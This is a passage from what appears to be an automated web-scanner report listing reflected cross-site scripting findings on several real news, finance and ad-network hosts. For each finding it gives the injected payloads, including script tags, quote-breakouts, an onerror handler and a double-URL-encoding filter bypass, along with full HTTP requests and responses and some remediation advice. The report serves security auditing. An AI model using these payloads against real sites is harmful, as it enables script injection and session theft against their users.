Last-Modified: Thu, 03 Feb 2011 20:44:51 GMT
ETag: "483399-b85-49b66d64a36c0"
Accept-Ranges: bytes
Content-Length: 6606
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
http://ad.doubleclick.net/click;h=v8/3b07/3/0/*/a;207642206;1-0;0;29270204;4307-300/250;33472683/33490561/1;;~okv=;!category=;biz=1053;;;mc=b2pfreezone;tile=7;sz=336x280,300x250;;~aopt=6/1/ff/1;~sscs=?fe2e0";alert(1)//fbfb0034a22http://altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D3040010&clickTag=http://ad.doubleclick.net/click;h=v8/3b07/3/0/*/a;207642206;1-0;0;29270204;4307-300/250;33472683/33490561/1;;~okv=;!
...[SNIP]...

4.73. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the response as plain text between tags. The payload 71ca7<script>alert(1)</script>631a598379a was submitted in the csid parameter. Two caveats on the scanner's classification: the response is served as application/javascript and the value lands inside a JavaScript block comment, so the <script> tag is inert unless a client renders this response as an HTML document (confirm in a browser before reporting at this severity); and the value is not echoed unmodified but converted to upper case, which makes no difference to HTML tag names but breaks a JavaScript payload (ALERT is not alert).

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G0760871ca7<script>alert(1)</script>631a598379a HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 14 May 2011 10:09:19 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 15 May 2011 10:09:19 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 14 May 2011 10:09:19 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G0760871CA7<SCRIPT>ALERT(1)</SCRIPT>631A598379A" was not recognized.
*/

4.74. http://json6.ringrevenue.com/6/map_number [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://json6.ringrevenue.com
Path:   /6/map_number

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7eee0'%3balert(1)//7515d9488a3 was submitted in the REST URL parameter 2. This input was echoed as 7eee0';alert(1)//7515d9488a3 in the application's response. The reflection is in the 404 error page (text/html), which echoes the request path into ext_cookie_path, so any unknown path under this host is an injection point; 4.75 and 4.76 reach the same sink through other path segments.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6/map_number7eee0'%3balert(1)//7515d9488a3?jsoncallback=jsonp1305377517510&_=1305377522381&av_id=5510&url=http%3A%2F%2Fwww.midphase.com%2F&referer= HTTP/1.1
Host: json6.ringrevenue.com
Proxy-Connection: keep-alive
Referer: http://www.midphase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Sat, 14 May 2011 12:53:45 GMT
P3P: CP="CAO DSP CURa ADMa DEVa OUR NOR DEM STA" policyref="/w3c/p3p.xml"
Server: Mongrel 1.1.5
Set-Cookie: theme=generic; domain=.ringrevenue.com; path=/; expires=Mon, 14-May-2012 12:53:46 GMT
Set-Cookie: _rr_session_id=f163055218661cc27b695a8178c22dcb; domain=.ringrevenue.com; path=/; HttpOnly
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Status: 404
Vary: Accept-Encoding
Via: 1.1 www.ringrevenue.com
Connection: keep-alive
Content-Length: 10306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
);
return false;
});


Application.cookie_domain = ".ringrevenue.com";


var ext_cookie_path = '/6/map_number7eee0';alert(1)//7515d9488a3';


Ext.state.Manager.setProvider( new Ext.state.CookieProvider(
{
expires: new Date(new Date().getTime()+(1000*60*60*24*365)), //365 days

...[SNIP]...

4.75. http://json6.ringrevenue.com/images/ringrevenue/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://json6.ringrevenue.com
Path:   /images/ringrevenue/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98cb3'%3balert(1)//7af160695df was submitted in the REST URL parameter 1. This input was echoed as 98cb3';alert(1)//7af160695df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images98cb3'%3balert(1)//7af160695df/ringrevenue/favicon.ico HTTP/1.1
Host: json6.ringrevenue.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: theme=generic; _rr_session_id=f163055218661cc27b695a8178c22dcb

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Sun, 15 May 2011 11:54:16 GMT
Server: Mongrel 1.1.5
Set-Cookie: theme=generic; domain=.ringrevenue.com; path=/; expires=Tue, 15-May-2012 11:54:16 GMT
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Status: 404
Vary: Accept-Encoding
Via: 1.1 www.ringrevenue.com
Connection: keep-alive
Content-Length: 10221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
rel' ) );
return false;
});


Application.cookie_domain = ".ringrevenue.com";


var ext_cookie_path = '/images98cb3';alert(1)//7af160695df/ringrevenue/favicon.ico';


Ext.state.Manager.setProvider( new Ext.state.CookieProvider(
{
expires: new Date(new Date().getTime()+(1000*60*60*24*365)
...[SNIP]...

4.76. http://json6.ringrevenue.com/images/ringrevenue/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://json6.ringrevenue.com
Path:   /images/ringrevenue/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2bab'%3balert(1)//5e51e295be2 was submitted in the REST URL parameter 2. This input was echoed as d2bab';alert(1)//5e51e295be2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/ringrevenued2bab'%3balert(1)//5e51e295be2/favicon.ico HTTP/1.1
Host: json6.ringrevenue.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: theme=generic; _rr_session_id=f163055218661cc27b695a8178c22dcb

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Sun, 15 May 2011 11:54:32 GMT
Server: Mongrel 1.1.5
Set-Cookie: theme=generic; domain=.ringrevenue.com; path=/; expires=Tue, 15-May-2012 11:54:32 GMT
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Status: 404
Vary: Accept-Encoding
Via: 1.1 www.ringrevenue.com
Connection: keep-alive
Content-Length: 10221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
return false;
});


Application.cookie_domain = ".ringrevenue.com";


var ext_cookie_path = '/images/ringrevenued2bab';alert(1)//5e51e295be2/favicon.ico';


Ext.state.Manager.setProvider( new Ext.state.CookieProvider(
{
expires: new Date(new Date().getTime()+(1000*60*60*24*365)), //365 day
...[SNIP]...

4.77. http://json6.ringrevenue.com/images/ringrevenue/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://json6.ringrevenue.com
Path:   /images/ringrevenue/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73596'%3balert(1)//3a3ddf7380 was submitted in the REST URL parameter 3. This input was echoed as 73596';alert(1)//3a3ddf7380 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/ringrevenue/favicon.ico73596'%3balert(1)//3a3ddf7380 HTTP/1.1
Host: json6.ringrevenue.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: theme=generic; _rr_session_id=f163055218661cc27b695a8178c22dcb

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Sun, 15 May 2011 11:54:48 GMT
Server: Mongrel 1.1.5
Set-Cookie: theme=generic; domain=.ringrevenue.com; path=/; expires=Tue, 15-May-2012 11:54:48 GMT
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Status: 404
Vary: Accept-Encoding
Via: 1.1 www.ringrevenue.com
Connection: keep-alive
Content-Length: 10219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
return false;
});


Application.cookie_domain = ".ringrevenue.com";


var ext_cookie_path = '/images/ringrevenue/favicon.ico73596';alert(1)//3a3ddf7380';


Ext.state.Manager.setProvider( new Ext.state.CookieProvider(
{
expires: new Date(new Date().getTime()+(1000*60*60*24*365)), //365 days

...[SNIP]...

4.78. http://jtools.smartmoney.com/marketspectrum/spectrumServer [jsoncallback parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://jtools.smartmoney.com
Path:   /marketspectrum/spectrumServer

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 985ce<a>b6e12d05707 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /marketspectrum/spectrumServer?action=mapData&src=marketdata&jsoncallback=985ce<a>b6e12d05707&_=1305368020020 HTTP/1.1
Host: jtools.smartmoney.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/?zone=intromessage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=65a08c08-94ef-4153-a49e-58cc26e0596f; smintromsg1=true; smintromsg1e=true; __utmz=205638161.1305368018.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205638161.1117820965.1305368018.1305368018.1305368018.1; __utmc=205638161; __utmb=205638161.1.10.1305368018

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 10:19:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Content-Length: 991
Set-Cookie: NSC_tnz-ksvo-iuuq=ffffffff09f93b9c45525d5f4f58455e445a4a423660;expires=Sat, 14-May-2011 10:34:57 GMT;path=/

985ce<a>b6e12d05707({"timeInfo":{"timestamp":"6:19am EDT, 5/14/2011","stamp":"1305368344337"},"data":{name: "THE MARKET", children:[{"name":"HEALTH CARE","value":"-0.21","size":"1970454016000"},{"name":"FINANCIAL","value
...[SNIP]...

4.79. http://realestate.wsj.com/item/822547 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://realestate.wsj.com
Path:   /item/822547

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bae6%2527%253balert%25281%2529%252f%252fa24dd948b41 was submitted in the REST URL parameter 2. This input was echoed as 5bae6';alert(1)//a24dd948b41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /item/8225475bae6%2527%253balert%25281%2529%252f%252fa24dd948b41?as%5Bcountry_code%5D=us&as%5Blocation%5D=10010&as%5Bsid%5D=56936&as%5Btransaction%5D=for-sale&item_offset=1 HTTP/1.1
Host: realestate.wsj.com
Proxy-Connection: keep-alive
Referer: http://realestate.wsj.com/for-sale/us/10010?sid=56936
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; wsjregion=na%2cus; s_vnum=1307959748765%26vn%3D1; s_dbfe=1305367748766; mbox=session#1305367797515-52119#1305370512|check#true#1305368712; DJSESSION=ORCS%3Dna%2Cus%7C%7CBIZO%3Dbiz%3D1053%3B%7C%7CFREEREGSCRIMCOUNT%3Dnull; rsi_csl=lA; rsi_segs=G07608_10001; _vanilla_ui_session=BAh7BzoPc2Vzc2lvbl9pZCIlMWJlN2U5NTA2ZjA1YmMyMzA4YjQwNTg1NjZhMTRkOTE6EF9jc3JmX3Rva2VuIjFaZENHYzV6UXpVWHU4OVFXOVRENWRtRnVVc2N4bUdpSVZ0eERiVGsrS0NrPQ%3D%3D--ac4298512308a102427d420d41ce51f58a11780e; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2233%22%2C%22high%22%3A%5B%2270%22%5D%2C%22low%22%3A%5B%2256%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DSat%2C%2014%20May%202011%2010%3A29%3A14%20GMT%7C%7CweatherCode%3D10005; s_cc=true; s_invisit=true; s_sq=djglobal%2Cdjwsj%3D%2526pid%253DWSJ_RE_Search%252520Results_List%2526pidt%253D1%2526oid%253Dhttp%25253A//realestate.wsj.com/item/822547%25253Fas%2525255Bcountry_code%2525255D%25253Dus%252526as%2525255Blocation%2525255D%25253D10010%252526as%2525255Bsid%2525255D%25253D569%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 10:50:52 GMT
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
ETag: "c93aaeef52300df5bbe4e172ec3d3c42"
X-Runtime: 364
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _vanilla_ui_session=BAh7BzoPc2Vzc2lvbl9pZCIlMWJlN2U5NTA2ZjA1YmMyMzA4YjQwNTg1NjZhMTRkOTE6EF9jc3JmX3Rva2VuIjFaZENHYzV6UXpVWHU4OVFXOVRENWRtRnVVc2N4bUdpSVZ0eERiVGsrS0NrPQ%3D%3D--ac4298512308a102427d420d41ce51f58a11780e; path=/; HttpOnly
ntCoent-Length: 69760
Status: 200
nnCoection: close
Content-Type: text/html; charset=utf-8
Content-Length: 69760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head
...[SNIP]...
sultList.resultIds = [83336];
               Search.start = 0;
       Search.rows = 1;
       Search.sorting = '';
       Search.map = 0;
       Search.transaction = 'for-sale';
       Search.facets.clear();
   Search.addFacet('id','8225475bae6';alert(1)//a24dd948b41');                Search.newSearch = true;
   </script>
...[SNIP]...

4.80. http://sbklivequoteserverdl.smartmoney.com/livequote/tokenJSON [jsoncallback parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://sbklivequoteserverdl.smartmoney.com
Path:   /livequote/tokenJSON

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 3ecce<a>4f9c5407d3e was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /livequote/tokenJSON?list=NLS:AAPL,BAC,CSCO,F,GE,$I.DJI,$I.COMPX,$INX&jsoncallback=jQuery15106331928954459727_13053680199773ecce<a>4f9c5407d3e&_=1305368021618 HTTP/1.1
Host: sbklivequoteserverdl.smartmoney.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/?zone=intromessage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=65a08c08-94ef-4153-a49e-58cc26e0596f; smintromsg1=true; smintromsg1e=true; __utmz=205638161.1305368018.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205638161.1117820965.1305368018.1305368018.1305368018.1; __utmc=205638161; __utmb=205638161.1.10.1305368018; s_vnum=1307960020151%26vn%3D1; s_dbfe=1305368020152; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/x-javascript
Date: Sat, 14 May 2011 10:19:09 GMT
Content-Length: 226

jQuery15106331928954459727_13053680199773ecce<a>4f9c5407d3e({"token" : "1037D381681A41D3B5CEEB943EC58008", "data" : "340.5|-6.07,11.93|-0.27,16.88|-0.05,15.08|-0.18,19.89|-0.25,12595.75|-100.17,2828.47|-34.57,1337.77|-10.88"})

4.81. http://server.iad.liveperson.net/hc/44533531/ [lpCallId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/44533531/

Issue detail

The value of the lpCallId request parameter is copied into the HTML document as plain text between tags. The payload 5fd52<img%20src%3da%20onerror%3dalert(1)>da307982a87 was submitted in the lpCallId parameter. This input was echoed as 5fd52<img src=a onerror=alert(1)>da307982a87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/44533531/?lpCallId=1305377526944-2655fd52<img%20src%3da%20onerror%3dalert(1)>da307982a87&lpjson=2&site=44533531&sessionkey=H7032450980834070235-4139296687908663322K2753111&cmd=visitorPoll HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://server.iad.liveperson.net/hc/44533531/?cmd=file&file=preChatSurveyContent&site=44533531&sessionkey=H7032450980834070235-4139296687908663322K2753111&survey=Pre-Chat
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=7032450980834070235; LivePersonID=-16101514677756-1305377522:-1:-1:-1:-1; HumanClickCHATKEY=4139296687908663322; HumanClickSiteContainerID_44533531=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1305377524917

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:52:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_44533531=STANDALONE; path=/hc/44533531
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 14 May 2011 12:52:56 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 142

lpConnLib.Process({"ResultSet": {"lpCallId":"1305377526944-2655fd52<img src=a onerror=alert(1)>da307982a87","lpCallConfirm":"","lpData":[]}});

4.82. http://smartmoney.onespot.com/ism/nextclick_wsjdn/index.js [_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smartmoney.onespot.com
Path:   /ism/nextclick_wsjdn/index.js

Issue detail

The value of the _ request parameter is copied into the HTML document as plain text between tags. The payload 451fe<script>alert(1)</script>4278ff0e76f was submitted in the _ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ism/nextclick_wsjdn/index.js?url=http%3A%2F%2Fwww.smartmoney.com%2Finvest%2Fstrategies%2Fheavy-metal-debate-silver-vs-gold-1305310258887%2F&have_content=true&callback=onespot.dispatch&_=1305368029696451fe<script>alert(1)</script>4278ff0e76f HTTP/1.1
Host: smartmoney.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Cache-Control: public, max-age=3600
Content-Type: text/javascript; charset=utf-8
Date: Sat, 14 May 2011 10:21:51 GMT
ETag: "7588b5ee53624bb9c397ea850716e6c9"
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Status: 200
Via: 1.1 varnish
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 46
X-Varnish: 1066829701
Connection: keep-alive
Content-Length: 5702

onespot.dispatch451fe<script>alert(1)</script>4278ff0e76f({"status":"ready","results":"\r\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n <title>OneSpot NextClick
...[SNIP]...

4.83. http://smartmoney.onespot.com/ism/nextclick_wsjdn/index.js [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smartmoney.onespot.com
Path:   /ism/nextclick_wsjdn/index.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 90d1d<script>alert(1)</script>7e5368fbed8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ism/nextclick_wsjdn/index.js?url=http%3A%2F%2Fwww.smartmoney.com%2Finvest%2Fstrategies%2Fheavy-metal-debate-silver-vs-gold-1305310258887%2F&have_content=true&callback=onespot.dispatch90d1d<script>alert(1)</script>7e5368fbed8&_=1305368029696 HTTP/1.1
Host: smartmoney.onespot.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Cache-Control: public, max-age=3600
Content-Type: text/javascript; charset=utf-8
Date: Sat, 14 May 2011 10:21:25 GMT
ETag: "1c81e0cbf5462968bab2ac2a8df6bfed"
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Status: 200
Via: 1.1 varnish
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 79
X-Varnish: 1066829210
Connection: keep-alive
Content-Length: 5702

onespot.dispatch90d1d<script>alert(1)</script>7e5368fbed8({"status":"ready","results":"\r\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n <title>OneSpot NextClick
...[SNIP]...

4.84. http://topics.wsj.com/api-video/get_video_info.asp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://topics.wsj.com
Path:   /api-video/get_video_info.asp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21cdf"%3b6c5435b28da was submitted in the REST URL parameter 2. This input was echoed as 21cdf";6c5435b28da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api-video/get_video_info.asp21cdf"%3b6c5435b28da?guid={7A591B4C-215B-4895-A64A-C793AEEBB8A6}&fields=thumbnailURLSmall&cb=1534993 HTTP/1.1
Host: topics.wsj.com
Proxy-Connection: keep-alive
Referer: http://topics.wsj.com/subject/W/wall-street-journal/nbc-news-polls/6052
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
